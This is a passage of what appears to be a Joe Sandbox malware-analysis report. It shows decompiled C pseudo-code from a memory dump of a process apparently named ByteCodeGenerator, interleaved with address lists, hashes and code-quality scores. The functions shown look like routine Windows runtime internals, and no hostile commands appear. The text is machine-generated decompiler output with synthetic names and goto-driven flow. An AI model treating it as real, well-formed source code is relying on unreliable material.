                                  							}
                                  							__eflags = _t77 - _t118;
                                  							if(_t77 != _t118) {
                                  								goto L34;
                                  							}
                                  							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                  							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                  								goto L34;
                                  							}
                                  							_t113 = _v1056;
                                  							_v1060 = _t118;
                                  							__eflags = _t113;
                                  							if(_t113 == 0) {
                                  								goto L10;
                                  							}
                                  							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                  							goto L11;
                                  						}
                                  						_t118 =  *((intOrPtr*)(_t102 + 8));
                                  						__eflags = _t118 - _a20;
                                  						if(_t118 <= _a20) {
                                  							_t114 =  *(_t102 + 4);
                                  							_t77 = _t118;
                                  							goto L26;
                                  						}
                                  						_v1060 = _t118;
                                  						goto L10;
                                  					}
                                  					__eflags = _t122 - 0x80000005;
                                  					if(_t122 != 0x80000005) {
                                  						goto L15;
                                  					}
                                  					L034477F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                  					L18:
                                  					_t121 = _v1060;
                                  					goto L19;
                                  				}
                                  				_push( &_v1060);
                                  				_push(0x400);
                                  				_t102 =  &_v1036;
                                  				_push(_t102);
                                  				_push(2);
                                  				_push( &_v1048);
                                  				_push(_t116);
                                  				_t122 = E03469650();
                                  				if(_t122 >= 0) {
                                  					__eflags = 0;
                                  					_v1052 = 0;
                                  					goto L7;
                                  				}
                                  				if(_t122 == 0x80000005) {
                                  					goto L18;
                                  				}
                                  				goto L4;
                                  			}










































                                  0x0342c608
                                  0x0342c615
                                  0x0342c625
                                  0x0342c62d
                                  0x0342c635
                                  0x0342c640
                                  0x0342c680
                                  0x0342c687
                                  0x0342c688
                                  0x0342c689
                                  0x0342c694
                                  0x0342c694
                                  0x0342c642
                                  0x0342c64a
                                  0x0342c697
                                  0x03497a25
                                  0x03497a2b
                                  0x03497a2e
                                  0x03497a30
                                  0x03497bea
                                  0x03497bea
                                  0x00000000
                                  0x03497bea
                                  0x03497a36
                                  0x03497a43
                                  0x03497a48
                                  0x03497a4c
                                  0x03497a4e
                                  0x00000000
                                  0x00000000
                                  0x03497a58
                                  0x03497a5a
                                  0x03497a5b
                                  0x03497a5c
                                  0x03497a5d
                                  0x03497a63
                                  0x03497a64
                                  0x03497a6a
                                  0x03497a6c
                                  0x03497a6e
                                  0x034979cb
                                  0x034979cb
                                  0x034979ce
                                  0x034979d0
                                  0x03497a98
                                  0x03497a9b
                                  0x03497a9b
                                  0x03497a9e
                                  0x03497aa1
                                  0x03497bbe
                                  0x03497bbe
                                  0x03497bc0
                                  0x03497be0
                                  0x03497be0
                                  0x03497a01
                                  0x03497a01
                                  0x03497a05
                                  0x03497a07
                                  0x03497a15
                                  0x03497a15
                                  0x03497a1a
                                  0x00000000
                                  0x03497a1a
                                  0x03497bc2
                                  0x03497bc6
                                  0x03497bc9
                                  0x03497bcd
                                  0x03497bcf
                                  0x034979e6
                                  0x034979e6
                                  0x034979eb
                                  0x034979eb
                                  0x034979ef
                                  0x034979f1
                                  0x00000000
                                  0x00000000
                                  0x034979f3
                                  0x034979f5
                                  0x034979ff
                                  0x034979ff
                                  0x00000000
                                  0x034979ff
                                  0x034979f7
                                  0x034979fd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034979fd
                                  0x03497bd5
                                  0x03497bd8
                                  0x00000000
                                  0x00000000
                                  0x03497ba9
                                  0x03497bac
                                  0x03497bb0
                                  0x03497bb1
                                  0x03497bb1
                                  0x03497bb6
                                  0x00000000
                                  0x03497bb6
                                  0x03497aa7
                                  0x03497aaa
                                  0x00000000
                                  0x00000000
                                  0x03497ab2
                                  0x03497ab3
                                  0x03497ab5
                                  0x03497aec
                                  0x03497aef
                                  0x03497b25
                                  0x03497b28
                                  0x03497b62
                                  0x03497b64
                                  0x03497b8f
                                  0x03497b92
                                  0x03497b96
                                  0x03497b98
                                  0x00000000
                                  0x00000000
                                  0x03497b9e
                                  0x03497b9f
                                  0x03497ba3
                                  0x00000000
                                  0x03497ba3
                                  0x03497b66
                                  0x03497b68
                                  0x03497ae2
                                  0x03497ae2
                                  0x00000000
                                  0x03497ae2
                                  0x03497b6e
                                  0x03497b72
                                  0x03497b75
                                  0x03497b81
                                  0x03497b85
                                  0x03497b87
                                  0x00000000
                                  0x00000000
                                  0x03497b31
                                  0x03497b34
                                  0x03497b3c
                                  0x03497b45
                                  0x03497b46
                                  0x03497b4f
                                  0x03497b51
                                  0x03497b57
                                  0x03497b59
                                  0x03497b59
                                  0x00000000
                                  0x03497b59
                                  0x03497b77
                                  0x00000000
                                  0x03497b77
                                  0x03497b2a
                                  0x00000000
                                  0x03497b2a
                                  0x03497af1
                                  0x03497af3
                                  0x00000000
                                  0x00000000
                                  0x03497afb
                                  0x03497afc
                                  0x03497afe
                                  0x00000000
                                  0x00000000
                                  0x03497b00
                                  0x03497b03
                                  0x00000000
                                  0x00000000
                                  0x03497b05
                                  0x03497b09
                                  0x03497b0d
                                  0x03497b0f
                                  0x00000000
                                  0x00000000
                                  0x03497b18
                                  0x03497b1d
                                  0x00000000
                                  0x03497b1d
                                  0x03497ab7
                                  0x03497ab9
                                  0x00000000
                                  0x00000000
                                  0x03497abf
                                  0x03497ac1
                                  0x00000000
                                  0x00000000
                                  0x03497ac3
                                  0x03497ac6
                                  0x00000000
                                  0x00000000
                                  0x03497ac8
                                  0x03497acc
                                  0x03497ad0
                                  0x03497ad2
                                  0x00000000
                                  0x00000000
                                  0x03497adb
                                  0x00000000
                                  0x03497adb
                                  0x034979d6
                                  0x034979d9
                                  0x034979dc
                                  0x03497a91
                                  0x03497a94
                                  0x00000000
                                  0x03497a94
                                  0x034979e2
                                  0x00000000
                                  0x034979e2
                                  0x03497a74
                                  0x03497a7a
                                  0x00000000
                                  0x00000000
                                  0x03497a8a
                                  0x03497a21
                                  0x03497a21
                                  0x00000000
                                  0x03497a21
                                  0x0342c650
                                  0x0342c651
                                  0x0342c656
                                  0x0342c65c
                                  0x0342c65d
                                  0x0342c663
                                  0x0342c664
                                  0x0342c66a
                                  0x0342c66e
                                  0x034979c5
                                  0x034979c7
                                  0x00000000
                                  0x034979c7
                                  0x0342c67a
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37f1ebc311ec6bd03be7e5bd0cc507764f82d5ba5dfdbe403a35c24fc7eaa258
                                  • Instruction ID: 03ca4389d9d789eb42d2e1bedeb698bafdbe15fdd0de4ff7627e41d5b1f6977e
                                  • Opcode Fuzzy Hash: 37f1ebc311ec6bd03be7e5bd0cc507764f82d5ba5dfdbe403a35c24fc7eaa258
                                  • Instruction Fuzzy Hash: 3F818A756242019FEF25CE14C880A6BBFA8EF84254F18496FED559F340E331ED45CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 39%
                                  			E034BB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                  				char _v8;
                                  				signed int _v12;
                                  				signed int _t80;
                                  				signed int _t83;
                                  				intOrPtr _t89;
                                  				signed int _t92;
                                  				signed char _t106;
                                  				signed int* _t107;
                                  				intOrPtr _t108;
                                  				intOrPtr _t109;
                                  				signed int _t114;
                                  				void* _t115;
                                  				void* _t117;
                                  				void* _t119;
                                  				void* _t122;
                                  				signed int _t123;
                                  				signed int* _t124;
                                  
                                  				_t106 = _a12;
                                  				if((_t106 & 0xfffffffc) != 0) {
                                  					return 0xc000000d;
                                  				}
                                  				if((_t106 & 0x00000002) != 0) {
                                  					_t106 = _t106 | 0x00000001;
                                  				}
                                  				_t109 =  *0x3517b9c; // 0x0
                                  				_t124 = L03444620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                  				if(_t124 != 0) {
                                  					 *_t124 =  *_t124 & 0x00000000;
                                  					_t124[1] = _t124[1] & 0x00000000;
                                  					_t124[4] = _t124[4] & 0x00000000;
                                  					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                  						L13:
                                  						_push(_t124);
                                  						if((_t106 & 0x00000002) != 0) {
                                  							_push(0x200);
                                  							_push(0x28);
                                  							_push(0xffffffff);
                                  							_t122 = E03469800();
                                  							if(_t122 < 0) {
                                  								L33:
                                  								if((_t124[4] & 0x00000001) != 0) {
                                  									_push(4);
                                  									_t64 =  &(_t124[1]); // 0x4
                                  									_t107 = _t64;
                                  									_push(_t107);
                                  									_push(5);
                                  									_push(0xfffffffe);
                                  									E034695B0();
                                  									if( *_t107 != 0) {
                                  										_push( *_t107);
                                  										E034695D0();
                                  									}
                                  								}
                                  								_push(_t124);
                                  								_push(0);
                                  								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                  								L37:
                                  								L034477F0();
                                  								return _t122;
                                  							}
                                  							_t124[4] = _t124[4] | 0x00000002;
                                  							L18:
                                  							_t108 = _a8;
                                  							_t29 =  &(_t124[0x105]); // 0x414
                                  							_t80 = _t29;
                                  							_t30 =  &(_t124[5]); // 0x14
                                  							_t124[3] = _t80;
                                  							_t123 = 0;
                                  							_t124[2] = _t30;
                                  							 *_t80 = _t108;
                                  							if(_t108 == 0) {
                                  								L21:
                                  								_t112 = 0x400;
                                  								_push( &_v8);
                                  								_v8 = 0x400;
                                  								_push(_t124[2]);
                                  								_push(0x400);
                                  								_push(_t124[3]);
                                  								_push(0);
                                  								_push( *_t124);
                                  								_t122 = E03469910();
                                  								if(_t122 != 0xc0000023) {
                                  									L26:
                                  									if(_t122 != 0x106) {
                                  										L40:
                                  										if(_t122 < 0) {
                                  											L29:
                                  											_t83 = _t124[2];
                                  											if(_t83 != 0) {
                                  												_t59 =  &(_t124[5]); // 0x14
                                  												if(_t83 != _t59) {
                                  													L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                  												}
                                  											}
                                  											_push( *_t124);
                                  											E034695D0();
                                  											goto L33;
                                  										}
                                  										 *_a16 = _t124;
                                  										return 0;
                                  									}
                                  									if(_t108 != 1) {
                                  										_t122 = 0;
                                  										goto L40;
                                  									}
                                  									_t122 = 0xc0000061;
                                  									goto L29;
                                  								} else {
                                  									goto L22;
                                  								}
                                  								while(1) {
                                  									L22:
                                  									_t89 =  *0x3517b9c; // 0x0
                                  									_t92 = L03444620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                  									_t124[2] = _t92;
                                  									if(_t92 == 0) {
                                  										break;
                                  									}
                                  									_t112 =  &_v8;
                                  									_push( &_v8);
                                  									_push(_t92);
                                  									_push(_v8);
                                  									_push(_t124[3]);
                                  									_push(0);
                                  									_push( *_t124);
                                  									_t122 = E03469910();
                                  									if(_t122 != 0xc0000023) {
                                  										goto L26;
                                  									}
                                  									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                  								}
                                  								_t122 = 0xc0000017;
                                  								goto L26;
                                  							}
                                  							_t119 = 0;
                                  							do {
                                  								_t114 = _t124[3];
                                  								_t119 = _t119 + 0xc;
                                  								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                  								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                  								_t123 = _t123 + 1;
                                  								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                  							} while (_t123 < _t108);
                                  							goto L21;
                                  						}
                                  						_push(0x28);
                                  						_push(3);
                                  						_t122 = E0342A7B0();
                                  						if(_t122 < 0) {
                                  							goto L33;
                                  						}
                                  						_t124[4] = _t124[4] | 0x00000001;
                                  						goto L18;
                                  					}
                                  					if((_t106 & 0x00000001) == 0) {
                                  						_t115 = 0x28;
                                  						_t122 = E034BE7D3(_t115, _t124);
                                  						if(_t122 < 0) {
                                  							L9:
                                  							_push(_t124);
                                  							_push(0);
                                  							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                  							goto L37;
                                  						}
                                  						L12:
                                  						if( *_t124 != 0) {
                                  							goto L18;
                                  						}
                                  						goto L13;
                                  					}
                                  					_t15 =  &(_t124[1]); // 0x4
                                  					_t117 = 4;
                                  					_t122 = E034BE7D3(_t117, _t15);
                                  					if(_t122 >= 0) {
                                  						_t124[4] = _t124[4] | 0x00000001;
                                  						_v12 = _v12 & 0x00000000;
                                  						_push(4);
                                  						_push( &_v12);
                                  						_push(5);
                                  						_push(0xfffffffe);
                                  						E034695B0();
                                  						goto L12;
                                  					}
                                  					goto L9;
                                  				} else {
                                  					return 0xc0000017;
                                  				}
                                  			}




















                                  0x034bb8d9
                                  0x034bb8e4
                                  0x00000000
                                  0x034bb8e6
                                  0x034bb8f3
                                  0x034bb8f5
                                  0x034bb8f5
                                  0x034bb8f8
                                  0x034bb920
                                  0x034bb924
                                  0x034bb936
                                  0x034bb939
                                  0x034bb93d
                                  0x034bb948
                                  0x034bb9a0
                                  0x034bb9a0
                                  0x034bb9a4
                                  0x034bb9bf
                                  0x034bb9c4
                                  0x034bb9c6
                                  0x034bb9cd
                                  0x034bb9d1
                                  0x034bbad4
                                  0x034bbad8
                                  0x034bbada
                                  0x034bbadc
                                  0x034bbadc
                                  0x034bbadf
                                  0x034bbae0
                                  0x034bbae2
                                  0x034bbae4
                                  0x034bbaec
                                  0x034bbaee
                                  0x034bbaf0
                                  0x034bbaf0
                                  0x034bbaec
                                  0x034bbafb
                                  0x034bbafc
                                  0x034bbafe
                                  0x034bbb01
                                  0x034bbb01
                                  0x00000000
                                  0x034bbb06
                                  0x034bb9d7
                                  0x034bb9db
                                  0x034bb9db
                                  0x034bb9de
                                  0x034bb9de
                                  0x034bb9e4
                                  0x034bb9e7
                                  0x034bb9ea
                                  0x034bb9ec
                                  0x034bb9ef
                                  0x034bb9f3
                                  0x034bba1b
                                  0x034bba1b
                                  0x034bba23
                                  0x034bba24
                                  0x034bba27
                                  0x034bba2a
                                  0x034bba2b
                                  0x034bba2e
                                  0x034bba30
                                  0x034bba37
                                  0x034bba3f
                                  0x034bba9c
                                  0x034bbaa2
                                  0x034bbb13
                                  0x034bbb15
                                  0x034bbaae
                                  0x034bbaae
                                  0x034bbab3
                                  0x034bbab5
                                  0x034bbaba
                                  0x034bbac8
                                  0x034bbac8
                                  0x034bbaba
                                  0x034bbacd
                                  0x034bbacf
                                  0x00000000
                                  0x034bbacf
                                  0x034bbb1a
                                  0x00000000
                                  0x034bbb1c
                                  0x034bbaa7
                                  0x034bbb11
                                  0x00000000
                                  0x034bbb11
                                  0x034bbaa9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034bba41
                                  0x034bba41
                                  0x034bba41
                                  0x034bba58
                                  0x034bba5d
                                  0x034bba62
                                  0x00000000
                                  0x00000000
                                  0x034bba64
                                  0x034bba67
                                  0x034bba68
                                  0x034bba69
                                  0x034bba6c
                                  0x034bba6f
                                  0x034bba71
                                  0x034bba78
                                  0x034bba80
                                  0x00000000
                                  0x00000000
                                  0x034bba90
                                  0x034bba90
                                  0x034bba97
                                  0x00000000
                                  0x034bba97
                                  0x034bb9f5
                                  0x034bb9f7
                                  0x034bb9f7
                                  0x034bb9fa
                                  0x034bba03
                                  0x034bba07
                                  0x034bba0c
                                  0x034bba10
                                  0x034bba17
                                  0x00000000
                                  0x034bb9f7
                                  0x034bb9a6
                                  0x034bb9a8
                                  0x034bb9af
                                  0x034bb9b3
                                  0x00000000
                                  0x00000000
                                  0x034bb9b9
                                  0x00000000
                                  0x034bb9b9
                                  0x034bb94d
                                  0x034bb98f
                                  0x034bb995
                                  0x034bb999
                                  0x034bb960
                                  0x034bb967
                                  0x034bb968
                                  0x034bb96a
                                  0x00000000
                                  0x034bb96a
                                  0x034bb99b
                                  0x034bb99e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034bb99e
                                  0x034bb951
                                  0x034bb954
                                  0x034bb95a
                                  0x034bb95e
                                  0x034bb972
                                  0x034bb979
                                  0x034bb97d
                                  0x034bb97f
                                  0x034bb980
                                  0x034bb982
                                  0x034bb984
                                  0x00000000
                                  0x034bb984
                                  0x00000000
                                  0x034bb926
                                  0x00000000
                                  0x034bb926

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f4fa0be64971c70d0c3317e8c9ec22eadb9c0e84df887d9e6b26daacefb994e
                                  • Instruction ID: 97c2717bb4da9772bcaaa37fe9de276d3f52ac535f8e518ccf0dc82ba9477a41
                                  • Opcode Fuzzy Hash: 6f4fa0be64971c70d0c3317e8c9ec22eadb9c0e84df887d9e6b26daacefb994e
                                  • Instruction Fuzzy Hash: 20710036600B01EFE731DF25C840F96BBB5EB44720F18492EE6558F6A0DBB4E945CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E034A6DC9(signed int __ecx, void* __edx) {
                                  				unsigned int _v8;
                                  				intOrPtr _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				void* _t87;
                                  				void* _t95;
                                  				signed char* _t96;
                                  				signed int _t107;
                                  				signed int _t136;
                                  				signed char* _t137;
                                  				void* _t157;
                                  				void* _t161;
                                  				void* _t167;
                                  				intOrPtr _t168;
                                  				void* _t174;
                                  				void* _t175;
                                  				signed int _t176;
                                  				void* _t177;
                                  
                                  				_t136 = __ecx;
                                  				_v44 = 0;
                                  				_t167 = __edx;
                                  				_v40 = 0;
                                  				_v36 = 0;
                                  				_v32 = 0;
                                  				_v60 = 0;
                                  				_v56 = 0;
                                  				_v52 = 0;
                                  				_v48 = 0;
                                  				_v16 = __ecx;
                                  				_t87 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                  				_t175 = _t87;
                                  				if(_t175 != 0) {
                                  					_t11 = _t175 + 0x30; // 0x30
                                  					 *((short*)(_t175 + 6)) = 0x14d4;
                                  					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                  					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                  					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                  					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                  					E034A6B4C(_t167, _t11, 0x214,  &_v8);
                                  					_v12 = _v8 + 0x10;
                                  					_t95 = E03447D50();
                                  					_t137 = 0x7ffe0384;
                                  					if(_t95 == 0) {
                                  						_t96 = 0x7ffe0384;
                                  					} else {
                                  						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  					}
                                  					_push(_t175);
                                  					_push(_v12);
                                  					_push(0x402);
                                  					_push( *_t96 & 0x000000ff);
                                  					E03469AE0();
                                  					_t87 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                  					_t176 = _v16;
                                  					if((_t176 & 0x00000100) != 0) {
                                  						_push( &_v36);
                                  						_t157 = 4;
                                  						_t87 = E034A795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                  						if(_t87 >= 0) {
                                  							_v24 = E034A795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                  							_v28 = E034A795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                  							_push( &_v52);
                                  							_t161 = 5;
                                  							_t168 = E034A795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                  							_v20 = _t168;
                                  							_t107 = L03444620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                  							_v16 = _t107;
                                  							if(_t107 != 0) {
                                  								_v8 = _v8 & 0x00000000;
                                  								 *(_t107 + 0x20) = _t176;
                                  								 *((short*)(_t107 + 6)) = 0x14d5;
                                  								_t47 = _t107 + 0x24; // 0x24
                                  								_t177 = _t47;
                                  								E034A6B4C( &_v36, _t177, 0xc78,  &_v8);
                                  								_t51 = _v8 + 4; // 0x4
                                  								_t178 = _t177 + (_v8 >> 1) * 2;
                                  								_v12 = _t51;
                                  								E034A6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                  								_v12 = _v12 + _v8;
                                  								E034A6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                  								_t125 = _v8;
                                  								_v12 = _v12 + _v8;
                                  								E034A6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                  								_t174 = _v12 + _v8;
                                  								if(E03447D50() != 0) {
                                  									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  								}
                                  								_push(_v16);
                                  								_push(_t174);
                                  								_push(0x402);
                                  								_push( *_t137 & 0x000000ff);
                                  								E03469AE0();
                                  								L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                  								_t168 = _v20;
                                  							}
                                  							_t87 = L03442400( &_v36);
                                  							if(_v24 >= 0) {
                                  								_t87 = L03442400( &_v44);
                                  							}
                                  							if(_t168 >= 0) {
                                  								_t87 = L03442400( &_v52);
                                  							}
                                  							if(_v28 >= 0) {
                                  								return L03442400( &_v60);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t87;
                                  			}































                                  0x034a6dd4
                                  0x034a6dde
                                  0x034a6de1
                                  0x034a6de3
                                  0x034a6de6
                                  0x034a6de9
                                  0x034a6dec
                                  0x034a6def
                                  0x034a6df2
                                  0x034a6df5
                                  0x034a6dfe
                                  0x034a6e04
                                  0x034a6e09
                                  0x034a6e0d
                                  0x034a6e18
                                  0x034a6e1b
                                  0x034a6e22
                                  0x034a6e2d
                                  0x034a6e30
                                  0x034a6e36
                                  0x034a6e42
                                  0x034a6e4d
                                  0x034a6e50
                                  0x034a6e55
                                  0x034a6e5c
                                  0x034a6e6e
                                  0x034a6e5e
                                  0x034a6e67
                                  0x034a6e67
                                  0x034a6e73
                                  0x034a6e74
                                  0x034a6e77
                                  0x034a6e7c
                                  0x034a6e7d
                                  0x034a6e8e
                                  0x034a6e93
                                  0x034a6e9c
                                  0x034a6ea8
                                  0x034a6eab
                                  0x034a6eac
                                  0x034a6eb3
                                  0x034a6ecd
                                  0x034a6edc
                                  0x034a6ee2
                                  0x034a6ee5
                                  0x034a6ef2
                                  0x034a6efb
                                  0x034a6f01
                                  0x034a6f06
                                  0x034a6f0b
                                  0x034a6f11
                                  0x034a6f1a
                                  0x034a6f22
                                  0x034a6f26
                                  0x034a6f26
                                  0x034a6f33
                                  0x034a6f41
                                  0x034a6f44
                                  0x034a6f47
                                  0x034a6f54
                                  0x034a6f65
                                  0x034a6f77
                                  0x034a6f7c
                                  0x034a6f82
                                  0x034a6f91
                                  0x034a6f99
                                  0x034a6fa3
                                  0x034a6fae
                                  0x034a6fae
                                  0x034a6fba
                                  0x034a6fbb
                                  0x034a6fbc
                                  0x034a6fc1
                                  0x034a6fc2
                                  0x034a6fd3
                                  0x034a6fd8
                                  0x034a6fd8
                                  0x034a6fdf
                                  0x034a6fe8
                                  0x034a6fee
                                  0x034a6fee
                                  0x034a6ff5
                                  0x034a6ffb
                                  0x034a6ffb
                                  0x034a7004
                                  0x00000000
                                  0x034a700a
                                  0x034a7004
                                  0x034a6eb3
                                  0x034a6e9c
                                  0x034a7015

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                  • Instruction ID: 6df821f0b8b4affdb636ba95558a6dba80b9688bfd9bd9d765a5fa1f0d011939
                                  • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                  • Instruction Fuzzy Hash: 28718C75A00619AFDB10DFA9C984AAEFBB8FF48304F14446AE504AF250DB34EA41CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E034252A5(char __ecx) {
                                  				char _v20;
                                  				char _v28;
                                  				char _v29;
                                  				void* _v32;
                                  				void* _v36;
                                  				void* _v37;
                                  				void* _v38;
                                  				void* _v40;
                                  				void* _v46;
                                  				void* _v64;
                                  				void* __ebx;
                                  				intOrPtr* _t49;
                                  				signed int _t53;
                                  				short _t85;
                                  				signed int _t87;
                                  				signed int _t88;
                                  				signed int _t89;
                                  				intOrPtr _t101;
                                  				intOrPtr* _t102;
                                  				intOrPtr* _t104;
                                  				signed int _t106;
                                  				void* _t108;
                                  
                                  				_t93 = __ecx;
                                  				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                  				_push(_t88);
                                  				_v29 = __ecx;
                                  				_t89 = _t88 | 0xffffffff;
                                  				while(1) {
                                  					E0343EEF0(0x35179a0);
                                  					_t104 =  *0x3518210; // 0xca2c40
                                  					if(_t104 == 0) {
                                  						break;
                                  					}
                                  					asm("lock inc dword [esi]");
                                  					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                  					E0343EB70(_t93, 0x35179a0);
                                  					if( *((char*)(_t108 + 0xf)) != 0) {
                                  						_t101 =  *0x7ffe02dc;
                                  						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                  						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                  							L9:
                                  							_push(0);
                                  							_push(0);
                                  							_push(0);
                                  							_push(0);
                                  							_push(0x90028);
                                  							_push(_t108 + 0x20);
                                  							_push(0);
                                  							_push(0);
                                  							_push(0);
                                  							_push( *((intOrPtr*)(_t104 + 4)));
                                  							_t53 = E03469890();
                                  							__eflags = _t53;
                                  							if(_t53 >= 0) {
                                  								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                  								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                  									E0343EEF0(0x35179a0);
                                  									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                  									E0343EB70(0, 0x35179a0);
                                  								}
                                  								goto L3;
                                  							}
                                  							__eflags = _t53 - 0xc0000012;
                                  							if(__eflags == 0) {
                                  								L12:
                                  								_t13 = _t104 + 0xc; // 0xca2c4d
                                  								_t93 = _t13;
                                  								 *((char*)(_t108 + 0x12)) = 0;
                                  								__eflags = E0345F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                  								if(__eflags >= 0) {
                                  									L15:
                                  									_t102 = _v28;
                                  									 *_t102 = 2;
                                  									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                  									E0343EEF0(0x35179a0);
                                  									__eflags =  *0x3518210 - _t104; // 0xca2c40
                                  									if(__eflags == 0) {
                                  										__eflags =  *((char*)(_t108 + 0xe));
                                  										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                  										 *0x3518210 = _t102;
                                  										_t32 = _t102 + 0xc; // 0x0
                                  										 *_t95 =  *_t32;
                                  										_t33 = _t102 + 0x10; // 0x0
                                  										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                  										_t35 = _t102 + 4; // 0xffffffff
                                  										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                  										if(__eflags != 0) {
                                  											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                  											E034A4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                  										}
                                  										E0343EB70(_t95, 0x35179a0);
                                  										asm("lock xadd [esi], eax");
                                  										if(__eflags == 0) {
                                  											_push( *((intOrPtr*)(_t104 + 4)));
                                  											E034695D0();
                                  											L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                  											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                  										}
                                  										asm("lock xadd [esi], ebx");
                                  										__eflags = _t89 == 1;
                                  										if(_t89 == 1) {
                                  											_push( *((intOrPtr*)(_t104 + 4)));
                                  											E034695D0();
                                  											L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                  											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                  										}
                                  										_t49 = _t102;
                                  										L4:
                                  										return _t49;
                                  									}
                                  									E0343EB70(_t93, 0x35179a0);
                                  									asm("lock xadd [esi], eax");
                                  									if(__eflags == 0) {
                                  										_push( *((intOrPtr*)(_t104 + 4)));
                                  										E034695D0();
                                  										L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                  										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                  									}
